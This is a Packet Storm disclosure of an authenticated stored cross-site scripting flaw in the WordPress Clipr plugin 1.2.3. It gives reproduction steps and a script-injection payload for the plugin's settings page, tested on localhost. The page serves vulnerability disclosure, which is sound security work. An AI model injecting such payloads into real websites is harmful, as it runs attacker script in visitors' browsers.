WordPress Clipr plugin version 1.2.3 suffers from a cross site scripting vulnerability.
6c8cc47abd770ee7d797e8c43b0287851023dee1813ddeb31d3ee6d614ef4a8a# Exploit Title: WordPress plugin clipr version 1.2.3 - ( Authenticated )
# Date: 29-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/clipr/
<https://wordpress.org/plugins/amministrazione-aperta/>
# Version: 1.2.3
# Tested on: Firefox
# Contact me: h [at] spidersilk.com
# POC
- Install Plugin https://wordpress.org/plugins/clipr/
- Navigate to the settings page pf the plugin:
http://localhost:10003/wp-admin/options-general.php?page=clipr
- Inject paylaod `asdasd'></script><script>alert(1)</script>`
- Navigate to the main page of the WordPress URL
`http://localhost:10003/` <http://localhost:10003/>
- Malicious Javascript payload will execute.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed